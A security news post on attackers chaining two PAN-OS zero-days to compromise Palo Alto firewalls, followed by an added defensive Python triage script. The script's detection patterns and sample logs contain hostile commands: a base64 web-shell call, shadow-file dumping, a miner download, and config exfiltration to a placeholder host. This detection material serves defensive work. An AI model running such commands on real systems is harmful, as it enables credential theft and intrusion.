Zero day exploited in Palo Alto Networks

  • Writer: Ferdinent Fernandez
  • Nov 25, 2024
  • 2 min read

Updated: Nov 26, 2024

Palo Alto Networks devices compromised in latest attacks


Attackers have compromised around 2,000 Palo Alto Networks firewalls by leveraging the two recently patched zero-days (CVE-2024-0012 and CVE-2024-9474). Compromised devices are predominantly located in the US and India.


Recently, Palo Alto Networks issued a warning about attackers exploiting a zero-day vulnerability to achieve remote code execution on affected devices. The company recommended that administrators restrict access to the devices' management interfaces to mitigate the risk.



Around two weeks ago, Palo Alto Networks disclosed that two zero-day vulnerabilities were being actively exploited. The first, CVE-2024-0012, allows unauthorized access to vulnerable devices' management interfaces, while the second, CVE-2024-9474, lets attackers escalate privileges to root on compromised firewalls. Exploits have been observed where attackers deploy web shells on affected devices.


Security researchers from WatchTowr later analyzed how these vulnerabilities could be chained together, publishing a Nuclei template to help administrators identify affected devices. Despite this, attacks have persisted, and Palo Alto has warned of a potential escalation, stating with moderate to high confidence that a working exploit chain for these vulnerabilities is publicly available. Automated and manual scans have increased as third-party tools for exploitation have become widespread.


The vulnerabilities impact not only Palo Alto firewalls but also Panorama (firewall management) and WildFire (sandboxing) appliances running PAN-OS. Palo Alto Networks has been actively updating indicators of compromise (IoCs) and advising organizations to follow remediation guidelines outlined in their security advisories.


On November 22, Arctic Wolf researchers reported intrusions involving Palo Alto firewalls across multiple industries. The attacks began shortly after WatchTowr’s analysis was released and likely involved chaining CVE-2024-0012 and CVE-2024-9474 for initial access. Post-compromise activities included:

  • Downloading a Sliver command-and-control implant.

  • Stealing configuration files, along with passwd and shadow files.

  • Deploying obfuscated PHP web shells.

  • Installing the XMRig cryptocurrency miner.
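As a defender-side illustration of the post-compromise activity listed above, here is an added Python triage helper; it is not from the article or from Palo Alto Networks, and its detection rules, sample log lines and the 203.0.113.0/24 hosts are constructed assumptions rather than published indicators.

```python
import re
from typing import Dict, List, Tuple

# Rules keyed to the post-compromise behaviours listed above. The regexes are
# illustrative assumptions for a first triage pass, not vendor-published IoCs.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # obfuscated PHP web shell: a .php request carrying eval/assert(... base64_decode
    ("php_webshell", re.compile(r"\.php\b.*\b(eval|assert|system|passthru)\s*\(.*base64_decode", re.I)),
    # credential material being read (passwd / shadow files)
    ("credential_file_read", re.compile(r"/etc/(passwd|shadow)\b")),
    # firewall configuration leaving the box through a transfer tool
    ("config_exfil", re.compile(r"\b(curl|wget|scp|nc|ftp)\b.*(running-config|\.xml\b)", re.I)),
    # XMRig miner binary or a stratum mining endpoint
    ("xmrig_miner", re.compile(r"\bxmrig\b|stratum\+tcp://", re.I)),
]

# Constructed sample lines in a simplified "timestamp process message" shape.
# Hosts use the documentation range 203.0.113.0/24; nothing here is real telemetry.
SAMPLE_LOGS: List[str] = [
    "2024-11-22T10:01:05 httpd POST /x.php body=eval(base64_decode($_POST['c']))",
    "2024-11-22T10:01:09 sh cat /etc/passwd /etc/shadow > /tmp/.c",
    "2024-11-22T10:01:15 sh curl -o /tmp/xmrig http://203.0.113.10/xmrig",
    "2024-11-22T10:01:20 sh scp ./running-config.xml 203.0.113.10:/tmp/",
    "2024-11-22T10:05:00 mgmtsrvr scheduled config backup completed",
]


def triage(lines: List[str]) -> Dict[str, List[str]]:
    """Map every rule label to the lines it matched (empty list when none)."""
    hits: Dict[str, List[str]] = {label: [] for label, _ in RULES}
    for line in lines:
        for label, pattern in RULES:
            if pattern.search(line):
                hits[label].append(line)
    return hits


def chain_suspected(hits: Dict[str, List[str]], min_categories: int = 2) -> bool:
    """Escalate when several distinct behaviours co-occur; one category alone
    is a weaker signal (a legitimate config copy also trips config_exfil)."""
    return sum(1 for lines in hits.values() if lines) >= min_categories


if __name__ == "__main__":
    findings = triage(SAMPLE_LOGS)
    for label, lines in findings.items():
        print(f"{label}: {len(lines)} hit(s)")
    print("escalate:", chain_suspected(findings))
```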


Organizations using affected systems are urged to apply mitigation measures promptly to reduce the risk of further exploitation.

